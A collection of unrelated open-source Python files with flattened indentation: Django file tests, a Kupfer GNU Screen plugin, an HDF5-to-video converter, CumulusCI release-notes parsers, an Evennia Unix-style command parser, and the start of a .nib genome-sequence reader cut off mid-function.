wrapper = TextIOWrapper(test_file, 'utf-8', newline='\n')
self.assertEqual(wrapper.read(), content)
# The following seek() call is required on Windows Python 2 when
# switching from reading to writing.
wrapper.seek(0, 2)
wrapper.write(content)
wrapper.seek(0)
self.assertEqual(wrapper.read(), content * 2)
test_file = wrapper.detach()
test_file.seek(0)
self.assertEqual(test_file.read(), (content * 2).encode('utf-8'))
class NoNameFileTestCase(unittest.TestCase):
"""
Other examples of unnamed files may be tempfile.SpooledTemporaryFile or
urllib.urlopen()
"""
def test_noname_file_default_name(self):
self.assertIsNone(File(BytesIO(b'A file with no name')).name)
def test_noname_file_get_size(self):
self.assertEqual(File(BytesIO(b'A file with no name')).size, 19)
class ContentFileTestCase(unittest.TestCase):
def test_content_file_default_name(self):
self.assertIsNone(ContentFile(b"content").name)
def test_content_file_custom_name(self):
"""
The constructor of ContentFile accepts 'name' (#16590).
"""
name = "I can have a name too!"
self.assertEqual(ContentFile(b"content", name=name).name, name)
def test_content_file_input_type(self):
"""
ContentFile can accept both bytes and unicode and that the
retrieved content is of the same type.
"""
self.assertIsInstance(ContentFile(b"content").read(), bytes)
if six.PY3:
self.assertIsInstance(ContentFile("español").read(), six.text_type)
else:
self.assertIsInstance(ContentFile("español").read(), bytes)
class DimensionClosingBug(unittest.TestCase):
"""
get_image_dimensions() properly closes files (#8817)
"""
@unittest.skipUnless(Image, "Pillow not installed")
def test_not_closing_of_files(self):
"""
Open files passed into get_image_dimensions() should stay opened.
"""
empty_io = BytesIO()
try:
images.get_image_dimensions(empty_io)
finally:
self.assertTrue(not empty_io.closed)
@unittest.skipUnless(Image, "Pillow not installed")
def test_closing_of_filenames(self):
"""
get_image_dimensions() called with a filename should closed the file.
"""
# We need to inject a modified open() builtin into the images module
# that checks if the file was closed properly if the function is
# called with a filename instead of an file object.
# get_image_dimensions will call our catching_open instead of the
# regular builtin one.
class FileWrapper(object):
_closed = []
def __init__(self, f):
self.f = f
def __getattr__(self, name):
return getattr(self.f, name)
def close(self):
self._closed.append(True)
self.f.close()
def catching_open(*args):
return FileWrapper(open(*args))
images.open = catching_open
try:
images.get_image_dimensions(os.path.join(os.path.dirname(upath(__file__)), "test1.png"))
finally:
del images.open
self.assertTrue(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
"""
get_image_dimensions() works properly after various calls
using a file handler (#11158)
"""
@unittest.skipUnless(Image, "Pillow not installed")
def test_multiple_calls(self):
"""
Multiple calls of get_image_dimensions() should return the same size.
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
with open(img_path, 'rb') as fh:
image = images.ImageFile(fh)
image_pil = Image.open(fh)
size_1 = images.get_image_dimensions(image)
size_2 = images.get_image_dimensions(image)
self.assertEqual(image_pil.size, size_1)
self.assertEqual(size_1, size_2)
@unittest.skipUnless(Image, "Pillow not installed")
def test_bug_19457(self):
"""
Regression test for #19457
get_image_dimensions fails on some pngs, while Image.size is working good on them
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "magic.png")
size = images.get_image_dimensions(img_path)
with open(img_path, 'rb') as fh:
self.assertEqual(size, Image.open(fh).size)
@unittest.skipUnless(Image, "Pillow not installed")
class GetImageDimensionsTests(unittest.TestCase):
def test_invalid_image(self):
"""
get_image_dimensions() should return (None, None) for the dimensions of
invalid images (#24441).
brokenimg.png is not a valid image and it has been generated by:
$ echo "123" > brokenimg.png
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "brokenimg.png")
with open(img_path, 'rb') as fh:
size = images.get_image_dimensions(fh)
self.assertEqual(size, (None, None))
def test_valid_image(self):
"""
get_image_dimensions() should catch struct.error while feeding the PIL
Image parser (#24544).
Emulates the Parser feed error. Since the error is raised on every feed
attempt, the resulting image size should be invalid: (None, None).
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
with mock.patch('PIL.ImageFile.Parser.feed', side_effect=struct.error):
with open(img_path, 'rb') as fh:
size = images.get_image_dimensions(fh)
self.assertEqual(size, (None, None))
class FileMoveSafeTests(unittest.TestCase):
def test_file_move_overwrite(self):
handle_a, self.file_a = tempfile.mkstemp()
handle_b, self.file_b = tempfile.mkstemp()
# file_move_safe should raise an IOError exception if destination file exists and allow_overwrite is False
with self.assertRaises(IOError):
file_move_safe(self.file_a, self.file_b, allow_overwrite=False)
# should allow it and continue on if allow_overwrite is True
self.assertIsNone(file_move_safe(self.file_a, self.file_b, allow_overwrite=True))
os.close(handle_a)
os.close(handle_b)
class SpooledTempTests(unittest.TestCase):
def test_in_memory_spooled_temp(self):
with tempfile.SpooledTemporaryFile() as temp:
temp.write(b"foo bar baz quux\n")
django_file = File(temp, name="something.txt")
self.assertEqual(django_file.size, 17)
def test_written_spooled_temp(self):
with tempfile.SpooledTemporaryFile(max_size=4) as temp:
temp.write(b"foo bar baz quux\n")
django_file = File(temp, name="something.txt")
self.assertEqual(django_file.size, 17)
|
__kupfer_name__ = _("GNU Screen")
__kupfer_sources__ = ("ScreenSessionsSource", )
__description__ = _("Active GNU Screen sessions")
__version__ = ""
__author__ = "Ulrik Sverdrup <[email protected]>"
import os
from kupfer.objects import Leaf, Action, Source
from kupfer.obj.helplib import FilesystemWatchMixin
from kupfer import utils
def screen_sessions_infos():
"""
Yield tuples of pid, name, time, status
for running screen sessions
"""
pipe = os.popen("screen -list")
output = pipe.read()
for line in output.splitlines():
fields = line.split("\t")
if len(fields) == 4:
empty, pidname, time, status = fields
pid, name = pidname.split(".", 1)
time = time.strip("()")
status = status.strip("()")
yield (pid, name, time, status)
def get_username():
"""Return username for current user"""
import pwd
info = pwd.getpwuid(os.geteuid())
return info[0]
class ScreenSession (Leaf):
"""Represented object is the session pid as string"""
def get_actions(self):
return (AttachScreen(),)
def get_description(self):
for pid, name, time, status in screen_sessions_infos():
if self.object == pid:
break
else:
return "%s (%s)" % (self.name, self.object)
# Handle localization of status
status_dict = {
"Attached": _("Attached"),
"Detached": _("Detached"),
}
status = status_dict.get(status, status)
return (_("%(status)s session (%(pid)s) created %(time)s") %
{"status": status, "pid": pid, "time": time})
def get_icon_name(self):
return "gnome-window-manager"
class ScreenSessionsSource (Source, FilesystemWatchMixin):
"""Source for GNU Screen sessions"""
def __init__(self):
super(ScreenSessionsSource, self).__init__(_("Screen Sessions"))
def initialize(self):
self.screen_dir = (os.getenv("SCREENDIR") or
"/var/run/screen/S-%s" % get_username())
if not os.path.exists(self.screen_dir):
self.screen_dir = None
self.output_debug("Screen socket dir or SCREENDIR not found")
return
self.monitor_token = self.monitor_directories(self.screen_dir)
def get_items(self):
if not self.screen_dir:
return
for pid, name, time, status in screen_sessions_infos():
yield ScreenSession(pid, name)
def get_description(self):
return _("Active GNU Screen sessions")
def get_icon_name(self):
return "terminal"
def provides(self):
yield ScreenSession
class AttachScreen (Action):
"""
"""
def __init__(self):
name = _("Attach")
super(AttachScreen, self).__init__(name)
def activate(self, leaf):
pid = leaf.object
action = "screen -x -R %s" % pid
utils.launch_commandline(action, name=_("GNU Screen"),
in_terminal=True)
|
#!/usr/bin/env python
"""
Note: VideoWriter expects dimensions (x,y,3) and will fail otherwise,writing a tiny file perhaps
Remember, VLC has a long-standing bug where files under about 3fps don't playback
Note: the isColor parameter of VideoWriter works on Linux too
Example:
./Convert_HDF5_to_AVI.py ~/data/2012-12-25/extracted.h5 -o ~/data/2012-12-25/ex.ogv -cc4 THEO
Just get percentiles
./Convert_HDF5_to_AVI.py ~/data/2012-12-25/extracted.h5
"""
import sys
import logging
from pathlib import Path
import h5py
import numpy as np
from typing import List, Any
# from scipy.misc import bytescale BUGS
# from scipy.signal import wiener
from histutils import sixteen2eight
from pyimagevideo import VideoWriter
sys.tracebacklimit = 1
usecolor = False
PTILE = [5, 99.95]
"""
all of these codecs worked for me on Ubuntu 14.04 and 16.04
'MJPG' Motion JPEG
'XVID' MPEG-4
'FFV1' Lossless
'FMP4' MPEG-4
** maybe works somewhat
'THEO' ext='.ogv' #must name file .ogv, NOT .avi -- somewhat broken, per messages in ffplay
*** NOT working for me on Ubuntu 16.04 ***
'YV12'
'IYUV'
'Y41P' #silent error, no write
'YUV9' #silent error, no write -- 15.04 writes but nobody knows how to play
'DIB ' # silent error, no write
'CVID' #encoder not found
'MJ2C' #segmentation fault -- 15.04 blank video
"""
def hdf2avi(infn: Path, outfn: Path,
h5key: str, cc4: str,
mm=None, fps=None,
ptile=PTILE, step: int = 1):
"""
infn: HDF5 file containing video to read
outfn: video file
h5key: HDF5 path to video. Assuming shape Nframe x Y x X x 3 (RGB color) or Nframe x Y x X (gray)
"""
if h5key is None:
return
window = step * 100 # number of frames over which to auto contrast
infn = Path(infn).expanduser()
outfn = Path(outfn).expanduser()
assert infn.is_file(), f'{infn} is not a file'
assert outfn.suffix in ('.ogv', '.mkv', '.avi')
if cc4 == 'THEO':
assert outfn.suffix == '.ogv'
if outfn.is_file():
raise IOError(f'video output {outfn} already exists.')
# %% open HDF5 video for parameters
with h5py.File(infn, 'r') as f:
N, y, x = f[h5key].shape[:3]
Next = N // step
print(f'converting {Next} / {N} frames sized {x} x {y} from {infn} to {outfn}')
# %% initialize OpenCV video writer
if N < 100:
print(f'picking FPS=4, lossless codec FFV1 due to small amount Nframe {N}')
fps = 4
outfn.with_suffix('.avi')
cc4 = 'FFV1'
window = step * Next // 10
elif fps is None:
fps = 20
if fps <= 3:
logging.warning('FPS<=3 might not work with some AVI players e.g. VLC')
h: Any = VideoWriter(outfn, cc4, (x, y), fps, usecolor)
# %% loop over HDF5 video
for i in range(0, N, step):
if not i % window:
if mm is None:
minmax = np.percentile(f[h5key][i:i + window:step, :, :], ptile, interpolation='nearest')
else:
minmax = mm
if minmax[0] != minmax[1]:
print(f'{i/N*100:.1f} % min/max {minmax}\r', end="")
else:
logging.error(f'{i/N*100:.1f} % Min==max no input image contrast')
im = f[h5key][i, :, :]
# I = wiener(I,wienernhood)
# img = bytescale(I, minmax[0], minmax[1]) BUG
img = sixteen2eight(im, minmax)
h.write(img)
# %% close video
h.release()
def getprc(fn: Path, key: str, stride: int = 60, ptile: List[float] = PTILE):
""" plot some file statistics to help decide min/max"""
fn = Path(fn).expanduser()
fGB = fn.stat().st_size / 1e9
print(f'sampling {ptile} percentiles {fn}, reading {1/stride*fGB:.1f} of {fGB:.1f} GB')
with h5py.File(fn, 'r') as f:
prc = np.percentile(f[key][::stride, ...], ptile, interpolation='nearest')
print(f'percentiles {ptile}: {prc}')
def findvidvar(fn: Path):
"""
assumes which variable is video in an HDF5 file
by finding variable of larget size (number of elements) in an HDF5 file that's 3-D or 4-D
"""
fn = Path(fn).expanduser()
x = {}
with h5py.File(fn, 'r') as f:
for v in f:
if f[v].ndim in (3, 4):
x[v] = f[v].size
vid = max(x, key=x.get)
print(f'using "{vid}" as video variable in {fn}')
return vid
if __name__ == '__main__':
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
from argparse import ArgumentParser
p = ArgumentParser()
p.add_argument('infn', help='HDF5 video file to read')
p.add_argument('outfn', help='video file to write e.g. cool.avi')
p.add_argument('-k', '--h5key', help='key to HDF5 video (variable in HDF5 file)')
p.add_argument('-cc4', help='video codec CC4 code', default='FMP4')
p.add_argument('-minmax', help='minimum, maximum values. Automatic if not specified.')
p.add_argument('-fps', help='frames/sec of output video', type=int, default=None)
p.add_argument('-s', '--step', help='take every Nth frame (default 1)', type=int, default=1)
P = p.parse_args()
h5key = findvidvar(P.infn) if P.h5key is None else P.h5key
if not P.outfn:
getprc(P.infn, h5key)
else:
hdf2avi(P.infn, P.outfn, h5key, P.cc4, P.minmax, P.fps, step=P.step)
|
import re
import urllib.parse
import github3.exceptions
from cumulusci.core.exceptions import GithubApiNotFoundError
from cumulusci.oauth.salesforce import PROD_LOGIN_URL, SANDBOX_LOGIN_URL
from .exceptions import GithubIssuesError
class BaseChangeNotesParser(object):
def __init__(self, title):
self.title = title
self.content = []
def parse(self):
raise NotImplementedError()
def render(self, existing_content=""):
return "# {}\r\n\r\n{}".format(self.title, self._render())
def _render(self):
raise NotImplementedError()
class ChangeNotesLinesParser(BaseChangeNotesParser):
def __init__(self, release_notes_generator, title):
super(ChangeNotesLinesParser, self).__init__(title)
self.release_notes_generator = release_notes_generator
self.title = title
self._in_section = False
self.h2 = {} # dict of h2 sections - key=header, value is list of lines
self.h2_title = None # has value when in h2 section
def parse(self, change_note):
"""Returns True if a line was added to self._add_line was called, False otherwise"""
if not self.title:
self._in_section = True
line_added = False
change_note = self._process_change_note(change_note)
if not change_note:
return False
for line in change_note.splitlines():
line = self._process_line(line)
# Look for the starting line of the section
if self._is_start_line(line):
self._in_section = True
self.h2_title = None
continue
# Look for h2
if line.startswith("## "):
self.h2_title = re.sub(r"\s+#+$", "", line[3:]).lstrip()
continue
# Add all content once in the section
if self._in_section:
# End when the end of section is found
if self._is_end_line(line):
self._in_section = False
self.h2_title = None
continue
# Skip excluded lines
if self._is_excluded_line(line):
continue
self._add_line(line)
if self.title:
line_added = True
self._in_section = False
return line_added
def _process_change_note(self, change_note):
# subclasses override this if some manipulation is needed
return change_note
def _process_line(self, line):
try:
line = str(line, "utf-8")
except TypeError:
pass
return line.rstrip()
def _is_excluded_line(self, line):
if not line:
return True
def _is_start_line(self, line):
if self.title:
return line.upper() == "# {}".format(self.title.upper())
def _is_end_line(self, line):
# Also treat any new top level heading as end of section
if line.startswith("# "):
return True
def _add_line(self, line):
line = self._add_link(line)
if self.h2_title:
if self.h2_title not in self.h2:
self.h2[self.h2_title] = []
self.h2[self.h2_title].append(line)
return
self.content.append(line)
def _add_link(self, line):
return line
def render(self, existing_content=""):
if not self.content and not self.h2:
return ""
content = []
content.append(self._render_header())
if self.content:
content.append(self._render_content())
if self.h2:
content.append(self._render_h2())
return "\r\n".join(content)
def _render_header(self):
return "# {}\r\n".format(self.title)
def _render_content(self):
return "\r\n".join(self.content)
def _render_h2(self):
content = []
for h2_title in self.h2.keys():
content.append("\r\n## {}\r\n".format(h2_title))
content.append("\r\n".join(self.h2[h2_title]))
return "\r\n".join(content)
class GithubLinesParser(ChangeNotesLinesParser):
def __init__(self, release_notes_generator, title):
super(GithubLinesParser, self).__init__(release_notes_generator, title)
self.link_pr = release_notes_generator.link_pr
self.pr_number = None
self.pr_url = None
def _process_change_note(self, pull_request):
self.pr_number = pull_request.number
self.pr_url = pull_request.html_url
return pull_request.body
def _add_link(self, line):
if self.link_pr:
line += " [[PR{}]({})]".format(self.pr_number, self.pr_url)
return line
class IssuesParser(ChangeNotesLinesParser):
def __init__(self, release_notes_generator, title, issue_regex=None):
super(IssuesParser, self).__init__(release_notes_generator, title)
self.issue_regex = issue_regex or self._get_default_regex()
def _add_line(self, line):
# find issue numbers per line
issue_numbers = re.findall(self.issue_regex, line, flags=re.IGNORECASE)
for issue_number in issue_numbers:
self.content.append(int(issue_number))
def _get_default_regex(self):
return r"#(\d+)"
def _render_content(self):
issues = []
for issue in sorted(self.content):
issues.append("#{}".format(issue))
return "\r\n".join(issues)
class GithubIssuesParser(IssuesParser):
ISSUE_COMMENT = {
"beta": "Included in beta release",
"prod": "Included in production release",
}
def __init__(self, release_notes_generator, title, issue_regex=None):
super(GithubIssuesParser, self).__init__(
release_notes_generator, title, issue_regex
)
if not release_notes_generator.has_issues:
raise GithubIssuesError(
"Cannot use {}".format(self.__class__.__name__)
+ " because issues are disabled for this repository."
)
self.link_pr = release_notes_generator.link_pr
self.pr_number = None
self.pr_url = None
self.publish = release_notes_generator.do_publish
self.github = release_notes_generator.github
def _add_line(self, line):
# find issue numbers per line
issue_numbers = re.findall(self.issue_regex, line, flags=re.IGNORECASE)
for issue_number in issue_numbers:
self.content.append(
{
"issue_number": int(issue_number),
"pr_number": self.pr_number,
"pr_url": self.pr_url,
}
)
def _get_default_regex(self):
keywords = (
"close",
"closes",
"closed",
"fix",
"fixes",
"fixed",
"resolve",
"resolves",
"resolved",
)
return r"(?:{})\s\[?#(\d+)\]?".format("|".join(keywords))
def _render_content(self):
content = []
for item in sorted(self.content, key=lambda k: k["issue_number"]):
issue = self._get_issue(item["issue_number"])
txt = "#{}: {}".format(item["issue_number"], issue.title)
if self.link_pr:
txt += " [[PR{}]({})]".format(item["pr_number"], item["pr_url"])
content.append(txt)
if self.publish:
self._add_issue_comment(issue)
return "\r\n".join(content)
def _get_issue(self, issue_number):
try:
issue = self.github.issue(
self.release_notes_generator.github_info["github_owner"],
self.release_notes_generator.github_info["github_repo"],
issue_number,
)
except github3.exceptions.NotFoundError:
raise GithubApiNotFoundError("Issue #{} not found".format(issue_number))
return issue
def _process_change_note(self, pull_request):
self.pr_number = pull_request.number
self.pr_url = pull_request.html_url
return pull_request.body
def _add_issue_comment(self, issue):
# Ensure all issues have a comment on which release they were fixed
prefix_beta = self.release_notes_generator.github_info["prefix_beta"]
prefix_prod = self.release_notes_generator.github_info["prefix_prod"]
# ParentPullRequestNotesGenerator doesn't utilize a current_tag
if not hasattr(self.release_notes_generator, "current_tag"):
return
elif self.release_notes_generator.current_tag.startswith(prefix_beta):
is_beta = True
elif self.release_notes_generator.current_tag.startswith(prefix_prod):
is_beta = False
else:
# not production or beta tag, don't comment
return
if is_beta:
comment_prefix = self.ISSUE_COMMENT["beta"]
version_parts = re.findall(
r"{}(\d+\.\d+)-Beta_(\d+)".format(prefix_beta),
self.release_notes_generator.current_tag,
)
version_str = "{} (Beta {})".format(*version_parts[0])
else:
comment_prefix = self.ISSUE_COMMENT["prod"]
version_str = self.release_notes_generator.current_tag.replace(
prefix_prod, ""
)
has_comment = False
for comment in issue.comments():
if comment.body.startswith(comment_prefix):
has_comment = True
break
if not has_comment:
issue.create_comment("{} {}".format(comment_prefix, version_str))
class InstallLinkParser(ChangeNotesLinesParser):
def parse(self, change_note):
# There's no need to parse lines, this parser gets its values from task options
return False
def render(self, existing_content=""):
version_id = self.release_notes_generator.version_id
trial_info = self.release_notes_generator.trial_info
if (
not version_id
and not self.release_notes_generator.sandbox_date
and not self.release_notes_generator.production_date
and not trial_info
):
return existing_content
result = [self._render_header()]
if (
self.release_notes_generator.sandbox_date
or self.release_notes_generator.production_date
):
result.append("## Push Schedule")
if self.release_notes_generator.sandbox_date:
result.append(
f"Sandbox orgs: {self.release_notes_generator.sandbox_date}"
)
if self.release_notes_generator.production_date:
result.append(
f"Production orgs: {self.release_notes_generator.production_date}",
)
if version_id:
version_id = urllib.parse.quote_plus(version_id)
if (
self.release_notes_generator.sandbox_date
or self.release_notes_generator.production_date
):
result.append("")
result += [
"Sandbox & Scratch Orgs:",
f"{SANDBOX_LOGIN_URL}/packaging/installPackage.apexp?p0={version_id}",
"",
"Production & Developer Edition Orgs:",
f"{PROD_LOGIN_URL}/packaging/installPackage.apexp?p0={version_id}",
]
if trial_info:
if (
version_id
or self.release_notes_generator.sandbox_date
or self.release_notes_generator.production_date
):
result.append("")
result += ["## Trialforce Template ID", f"{trial_info}"]
return "\r\n".join(result)
|
"""
Unix-like Command style parent
Evennia contribution, Vincent Le Geoff 2017
This module contains a command class that allows for unix-style command syntax in-game, using
--options, positional arguments and stuff like -n 10 etc similarly to a unix command. It might not
the best syntax for the average player but can be really useful for builders when they need to have
a single command do many things with many options. It uses the ArgumentParser from Python's standard
library under the hood.
To use, inherit `UnixCommand` from this module from your own commands. You need
to override two methods:
- The `init_parser` method, which adds options to the parser. Note that you should normally
*not* override the normal `parse` method when inheriting from `UnixCommand`.
- The `func` method, called to execute the command once parsed (like any Command).
Here's a short example:
```python
class CmdPlant(UnixCommand):
'''
Plant a tree or plant.
This command is used to plant something in the room you are in.
Examples:
plant orange -a 8
plant strawberry --hidden
plant potato --hidden --age 5
'''
key = "plant"
def init_parser(self):
"Add the arguments to the parser."
# 'self.parser' inherits `argparse.ArgumentParser`
self.parser.add_argument("key",
help="the key of the plant to be planted here")
self.parser.add_argument("-a", "--age", type=int,
default=1, help="the age of the plant to be planted")
self.parser.add_argument("--hidden", action="store_true",
help="should the newly-planted plant be hidden to players?")
def func(self):
"func is called only if the parser succeeded."
# 'self.opts' contains the parsed options
key = self.opts.key
age = self.opts.age
hidden = self.opts.hidden
self.msg("Going to plant '{}', age={}, hidden={}.".format(
key, age, hidden))
```
To see the full power of argparse and the types of supported options, visit
[the documentation of argparse](https://docs.python.org/2/library/argparse.html).
"""
import argparse
import shlex
from textwrap import dedent
from evennia import Command, InterruptCommand
from evennia.utils.ansi import raw
class ParseError(Exception):
"""An error occurred during parsing."""
pass
class UnixCommandParser(argparse.ArgumentParser):
"""A modifier command parser for unix commands.
This parser is used to replace `argparse.ArgumentParser`. It
is aware of the command calling it, and can more easily report to
the caller. Some features (like the "brutal exit" of the original
parser) are disabled or replaced. This parser is used by UnixCommand
and creating one directly isn't recommended nor necessary. Even
adding a sub-command will use this replaced parser automatically.
"""
def __init__(self, prog, description="", epilog="", command=None, **kwargs):
"""
Build a UnixCommandParser with a link to the command using it.
Args:
prog (str): the program name (usually the command key).
description (str): a very brief line to show in the usage text.
epilog (str): the epilog to show below options.
command (Command): the command calling the parser.
Kwargs:
Additional keyword arguments are directly sent to
`argparse.ArgumentParser`. You will find them on the
[parser's documentation](https://docs.python.org/2/library/argparse.html).
Note:
It's doubtful you would need to create this parser manually.
The `UnixCommand` does that automatically. If you create
sub-commands, this class will be used.
"""
prog = prog or command.key
super(UnixCommandParser, self).__init__(
prog=prog, description=description,
conflict_handler='resolve', add_help=False, **kwargs)
self.command = command
self.post_help = epilog
def n_exit(code=None, msg=None):
raise ParseError(msg)
self.exit = n_exit
# Replace the -h/--help
self.add_argument("-h", "--hel", nargs=0, action=HelpAction,
help="display the command help")
def format_usage(self):
"""Return the usage line.
Note:
This method is present to return the raw-escaped usage line,
in order to avoid unintentional color codes.
"""
return raw(super(UnixCommandParser, self).format_usage())
def format_help(self):
"""Return the parser help, including its epilog.
Note:
This method is present to return the raw-escaped help,
in order to avoid unintentional color codes. Color codes
in the epilog (the command docstring) are supported.
"""
autohelp = raw(super(UnixCommandParser, self).format_help())
return "\n" + autohelp + "\n" + self.post_help
def print_usage(self, file=None):
"""Print the usage to the caller.
Args:
file (file-object): not used here, the caller is used.
Note:
This method will override `argparse.ArgumentParser`'s in order
to not display the help on stdout or stderr, but to the
command's caller.
"""
if self.command:
self.command.msg(self.format_usage().strip())
def print_help(self, file=None):
"""Print the help to the caller.
Args:
file (file-object): not used here, the caller is used.
Note:
This method will override `argparse.ArgumentParser`'s in order
to not display the help on stdout or stderr, but to the
command's caller.
"""
if self.command:
self.command.msg(self.format_help().strip())
class HelpAction(argparse.Action):
"""Override the -h/--help action in the default parser.
Using the default -h/--help will call the exit function in different
ways, preventing the entire help message to be provided. Hence
this override.
"""
def __call__(self, parser, namespace, values, option_string=None):
"""If asked for help, display to the caller."""
if parser.command:
parser.command.msg(parser.format_help().strip())
parser.exit(0, "")
class UnixCommand(Command):
"""
Unix-type commands, supporting short and long options.
This command syntax uses the Unix-style commands with short options
(-X) and long options (--something). The `argparse` module is
used to parse the command.
In order to use it, you should override two methods:
- `init_parser`: this method is called when the command is created.
It can be used to set options in the parser. `self.parser`
contains the `argparse.ArgumentParser`, so you can add arguments
here.
- `func`: this method is called to execute the command, but after
the parser has checked the arguments given to it are valid.
You can access the namespace of valid arguments in `self.opts`
at this point.
The help of UnixCommands is derived from the docstring, in a
slightly different way than usual: the first line of the docstring
is used to represent the program description (the very short
line at the top of the help message). The other lines below are
used as the program's "epilog", displayed below the options. It
means in your docstring, you don't have to write the options.
They will be automatically provided by the parser and displayed
accordingly. The `argparse` module provides a default '-h' or
'--help' option on the command. Typing |whelp commandname|n will
display the same as |wcommandname -h|n, though this behavior can
be changed.
"""
def __init__(self, **kwargs):
"""
The lockhandler works the same as for objects.
optional kwargs will be set as properties on the Command at runtime,
overloading evential same-named class properties.
"""
super(UnixCommand, self).__init__(**kwargs)
# Create the empty UnixCommandParser, inheriting argparse.ArgumentParser
lines = dedent(self.__doc__.strip("\n")).splitlines()
description = lines[0].strip()
epilog = "\n".join(lines[1:]).strip()
self.parser = UnixCommandParser(None, description, epilog, command=self)
# Fill the argument parser
self.init_parser()
def init_parser(self):
"""
Configure the argument parser, adding in options.
Note:
This method is to be overridden in order to add options
to the argument parser. Use `self.parser`, which contains
the `argparse.ArgumentParser`. You can, for instance,
use its `add_argument` method.
"""
pass
def func(self):
"""Override to handle the command execution."""
pass
def get_help(self, caller, cmdset):
"""
Return the help message for this command and this caller.
Args:
caller (Object or Player): the caller asking for help on the command.
cmdset (CmdSet): the command set (if you need additional commands).
Returns:
docstring (str): the help text to provide the caller for this command.
"""
return self.parser.format_help()
def parse(self):
"""
Process arguments provided in `self.args`.
Note:
You should not override this method. Consider overriding
`init_parser` instead.
"""
try:
self.opts = self.parser.parse_args(shlex.split(self.args))
except ParseError as err:
msg = str(err)
if msg:
self.msg(msg)
raise InterruptCommand
|
'''Functions and classes used to interface with .nib files as created by Jim
Kent's nibFrag and faToNib utilities.'''
import glob
import math
import os
import struct
import sys
import warnings
from cStringIO import StringIO
from collections import defaultdict as dd
from chipsequtil import reverse_complement, get_file_parts, BEDFile
# module fields
NOMASK,MASK,HARDMASK = range(3)
class NibException(Exception) : pass
def _nib_fd(nib) :
'''Returns filename and file descriptor for nib, detecting whether it is a \
path or fd appropriately'''
# check to see if nib is a file or a string
if isinstance(nib,file) :
nib_fn = nib.name
nib.seek(0)
nib_f = nib
elif isinstance(nib,str) :
nib_fn = nib
nib_f = open(nib,'rb')
else :
raise NibException('Incompatible .nib argument %s with type %s, needs to \
be either <type \'file\'> or <type \'str\'>'%(str(nib),type(nib)))
return nib_fn, nib_f
def get_nib(nib,start=0,end=-1,strand='+',mask=NOMASK,name=None,dbHeader=None,tbaHeader=None) :
'''Return a (header,sequence) tuple representing this nibFrag record'''
headers = get_nib_header_batch(nib,[(start,end,strand,name,dbHeader,tbaHeader),])
seqs = get_nib_seq_batch(nib,[(start,end,strand)],mask)
return headers[0], seqs[0]
def get_nib_batch(nib,queries,mask=NOMASK) :
'''Batch interface for fetching fasta records. Returns tuple of lists
(headers,sequences)'''
headers = get_nib_header_batch(nib,queries)
seqs = get_nib_seq_batch(nib,[x[:3] for x in queries],mask=mask)
return headers, seqs
def get_nib_seq(nib,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Default behavior is to return the entire sequence.
Extract the nucleotide substring defined by the closed interval [start,end]
from the sequence found in *nib_fn*. *mask* parameter has the following
possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are capitalized, normal bases lower case
chipsequtil.nib.NOMASK -- masked positions are replaced with Ns
'''
return get_nib_seq_batch(nib,[(start,end,strand)],mask)[0]
def get_nib_header(nib_fn,start=0,end=-1,strand='+',name=None,dbHeader=None,tbaHeader=None) :
'''Method for constructing fasta headers compliant with nibFrag utility'''
headers = get_nib_header_batch(nib,[(start,end,strand,name,dbHeader,tbaHeader),])
return headers[0]
def get_nib_header_batch(nib,queries) :
'''Batch method for creating nibFrag headers. *queries* is a list of at most
6-tuples (start,end,strand,name,dbHeader,tbaHeader) representing queries as
specified by the original nibFrag utility. Only start, end, and strand
fields are required.'''
nib_path, nib_f = _nib_fd(nib)
nib_dir,nib_fn,nib_base,nib_ext = get_file_parts(nib_path)
nbases = validate_nib_file(nib)
headers = []
header_tmpl = '>%(name)s%(db)s\n'
for rec in queries :
# set some defaults if they are not supplied
rec = list(rec)
rec.extend([None]*(6-len(rec)))
start, end, strand, name, dbHeader, tbaHeader = rec
if end == -1 :
end = nbases
fields = {}
fields['name'] = nib_path+':%d-%d'%(start,end) if not name else name
fields['db'] = ''
if tbaHeader :
# ignored for some reason in nibFrag when tbaHeader supplied and dbHeader is not
fields['name'] = '' if not dbHeader else fields['name']
fields['db'] = '%s.%s:%d-%d of %d'%(tbaHeader,nib_base,start,end,nbases)
if dbHeader :
fields['db'] = ':%s.%s:%d-%d:%s:%d'%(dbHeader,nib_base,start,end,strand,nbases)
headers.append(header_tmpl%fields)
return headers
def validate_nib_file(nib) :
'''Validate .nib file header, returning number of bases indicated if successful.
*nib* argument is either a filename or an open file object.
'''
nib_fn, nib_f = _nib_fd(nib)
# first 4 bytes are a nib file signature
#TODO - consider attempting to figure out byte order to make truly cross platform
def_sig = 0x6BE93D3A
sig = struct.unpack('=l',nib_f.read(4))[0]
if def_sig != sig :
raise NibException('Invalid nib file signature in %s, found %s, expected \
%s, perhaps .nib file as not created on this platform?\n\nnibFrag style \
error: %s is not not a good .nib file.'%(nib_fn,hex(sig),hex(def_sig),nib_fn))
# second 4 bytes are number of bases in sequence
nbases = struct.unpack('=l',nib_f.read(4))[0]
return nbases
def get_nib_seq_batch(nib,queries,mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Extract the nucleotide substrings defined by the closed intervals in *queries*
from the sequence found in *nib*. *nib* argument is either a filename or
an open file object. Entries in *queries* are 3-tuples defining (start,end,strand)
sequence coordinates. Sequences are returned in order in a list as
strings. *mask* parameter has the following possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are capitalized, normal bases lower case
chipsequtil.nib.NOMASK -- masked positions are replaced with Ns
'''
nib_fn, nib_f = _nib_fd(nib)
nbases = validate_nib_file(nib_f)
# rest of file is sequence, with each nibble (4 bytes) being a base as \
# follows (from http://genome.ucsc.edu/FAQ/FAQformat.html#format8) :
#
# 0 - T
# 1 - C
# 2 - A
# 3 - G
# 4 - N
#
# The most significant bit in a nibble is set if the base is masked
trans_nuc = 'tcagn'
# start translating the nibbles into nucleotides
def trans_nib(nib) :
nuc = trans_nuc[nib&7]
mask_bit = nib & 8
if mask in [MASK,HARDMASK] and mask_bit == 0 :
